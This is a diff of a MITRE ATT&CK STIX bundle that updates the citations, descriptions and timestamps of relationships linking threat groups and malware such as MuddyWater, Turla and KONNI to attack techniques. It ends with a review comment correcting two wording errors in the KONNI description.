"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.015Z",
+ "modified": "2020-05-18T19:37:52.441Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -70746,9 +71799,9 @@
],
"source_ref": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-20T17:47:38.377Z",
+ "modified": "2020-06-23T20:40:40.910Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -70960,9 +72013,9 @@
],
"source_ref": "intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"type": "relationship",
- "modified": "2020-03-19T18:07:50.071Z",
+ "modified": "2020-06-23T19:56:50.231Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -71194,12 +72247,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688"
},
{
"id": "relationship--66f5e718-f910-487f-852a-98a8d752b0ba",
@@ -71356,7 +72409,7 @@
{
"id": "relationship--e2675622-ec8e-4894-9f5e-3c82944e3019",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.(Citation: Kaspersky Turla)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the systeminfo, gpresult, and set commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -71365,13 +72418,18 @@
"url": "https://securelist.com/the-epic-turla-operation/65545/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
"source_name": "Kaspersky Turla"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.980Z",
+ "modified": "2020-06-29T02:52:31.812Z",
"created": "2017-05-31T21:33:27.045Z"
},
{
@@ -71519,12 +72577,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--a4a49b56-e220-4a81-a0da-43b63c012cfe",
@@ -71676,22 +72734,32 @@
{
"id": "relationship--63d53308-7d7d-4777-a1cc-c7100735609c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: MTrends 2016)",
+ "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf",
- "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.",
- "source_name": "MTrends 2016"
+ "source_name": "Mandiant M Trends 2016",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf",
+ "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ },
+ {
+ "source_name": "FireEye BOOTRASH SANS",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf",
+ "description": "Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020."
}
],
"source_ref": "malware--da2ef4a9-7cbe-400a-a379-e2f230f28db3",
"relationship_type": "uses",
"target_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba",
"type": "relationship",
- "modified": "2019-12-20T14:31:10.700Z",
+ "modified": "2020-05-07T22:29:30.674Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -72433,7 +73501,7 @@
{
"id": "relationship--927e8d82-d094-4170-bc76-10717ffd8d7f",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP and network adapter configuration information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP, network adapter configuration information, and domain from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -72442,13 +73510,18 @@
"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.016Z",
+ "modified": "2020-05-18T19:37:52.427Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -72679,12 +73752,12 @@
"url": "https://github.com/hfiref0x/UACME"
}
],
- "source_ref": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073"
},
{
"id": "relationship--992ffd2b-bac7-418c-a401-b2be739818c9",
@@ -72852,12 +73925,12 @@
"url": "https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/"
}
],
- "source_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c"
},
{
"id": "relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25",
@@ -73156,16 +74229,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.144Z",
+ "modified": "2020-05-14T15:14:33.567Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -73320,30 +74392,30 @@
{
"id": "relationship--5c2cd95f-9c3a-4893-9a5f-960cfed62572",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used Daniel Bohannon\u2019s Invoke-Obfuscation framework.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used Daniel Bohannon\u2019s Invoke-Obfuscation framework.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "GitHub Invoke-Obfuscation",
+ "url": "https://github.com/danielbohannon/Invoke-Obfuscation",
"description": "Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.",
- "url": "https://github.com/danielbohannon/Invoke-Obfuscation"
+ "source_name": "GitHub Invoke-Obfuscation"
},
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
@@ -73351,16 +74423,21 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.625Z",
+ "modified": "2020-05-18T17:29:31.216Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -73442,19 +74519,23 @@
"target_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
"url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
"description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.",
"source_name": "DustySky2"
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
- "description": "(Citation: DustySky)(Citation: DustySky2)",
+ "description": "(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.150Z",
+ "modified": "2020-05-14T14:30:09.805Z",
"created": "2017-05-31T21:33:27.055Z"
},
{
@@ -73785,12 +74866,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -74043,7 +75124,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "relationship",
- "modified": "2019-07-25T11:35:23.395Z",
+ "modified": "2020-07-14T19:45:59.762Z",
"created": "2017-05-31T21:33:27.027Z"
},
{
@@ -74297,15 +75378,20 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"id": "relationship--c5d09de5-7a1e-45b5-a7ac-1637e8fe8eff",
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-19T19:11:24.823Z",
+ "modified": "2020-05-18T19:37:52.438Z",
"created": "2019-01-30T17:13:11.872Z"
},
{
@@ -74481,27 +75567,6 @@
"modified": "2020-03-16T16:44:48.808Z",
"created": "2019-01-30T13:53:14.891Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Cybereason Oceanlotus May 2017",
- "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
- }
- ],
- "description": "[Denis](https://attack.mitre.org/software/S0354) uses port 53 for C2 communications.(Citation: Cybereason Oceanlotus May 2017)",
- "id": "relationship--c19e5c83-39fb-433b-a563-9f2390a9d51a",
- "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-04-24T20:56:04.632Z",
- "created": "2019-01-30T20:01:45.529Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -74686,12 +75751,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "intrusion-set--9559ecaf-2e75-48a7-aee8-9974020bc772",
- "relationship_type": "revoked-by",
- "target_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "intrusion-set--9559ecaf-2e75-48a7-aee8-9974020bc772",
+ "relationship_type": "revoked-by",
+ "target_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0"
},
{
"id": "relationship--4b45b720-a606-4c52-a28a-2ef298f9b42f",
@@ -75042,16 +76107,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.650Z",
+ "modified": "2020-04-21T23:09:31.026Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -75564,12 +76629,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475"
},
{
"id": "relationship--73da57b5-e64f-44ee-85f7-d294c21fb534",
@@ -75664,16 +76729,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.049Z",
+ "modified": "2020-05-12T22:13:16.872Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -75837,17 +76902,17 @@
"url": "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/"
}
],
- "source_ref": "malware--9ea525fa-b0a9-4dde-84f2-bcea0137b3c1",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9ea525fa-b0a9-4dde-84f2-bcea0137b3c1",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--b45c7b78-55c7-4418-ab03-9f805de7376d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for command and control communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for C2 communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -75867,7 +76932,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
"type": "relationship",
- "modified": "2020-03-20T21:27:37.757Z",
+ "modified": "2020-05-21T17:07:02.697Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -75940,12 +77005,12 @@
"url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
}
],
- "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--1ec53623-4050-498b-ba9e-f149d203036c",
@@ -76217,16 +77282,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.642Z",
+ "modified": "2020-04-21T23:09:31.331Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -76257,18 +77322,23 @@
],
"external_references": [
{
- "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.",
+ "source_name": "Talos Konni May 2017",
"url": "https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
- "source_name": "Talos Konni May 2017"
+ "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
}
],
- "description": "[KONNI](https://attack.mitre.org/software/S0356) can execute arbitrary commands on the infected host using cmd.exe.(Citation: Talos Konni May 2017)",
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used cmd.exe execute arbitrary commands on the infected host across different stages of the infection change.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)",
"id": "relationship--afb593c0-5388-441c-a868-c8bc520ffcaa",
"source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-20T02:11:56.554Z",
+ "modified": "2020-04-28T18:12:13.722Z",
"created": "2019-01-31T00:36:40.984Z"
},
{
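Review bot: The new KONNI description on the line starting `"description": "[KONNI]` has two wording errors: "has used cmd.exe execute arbitrary commands" is missing "to", and "infection change" should read "infection chain". Suggested text: `[KONNI](https://attack.mitre.org/software/S0356) has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection chain.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)`. If this file is a verbatim copy of the upstream ATT&CK STIX bundle, the correction belongs upstream so it is not overwritten on the next refresh.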
@@ -76278,23 +77348,28 @@
],
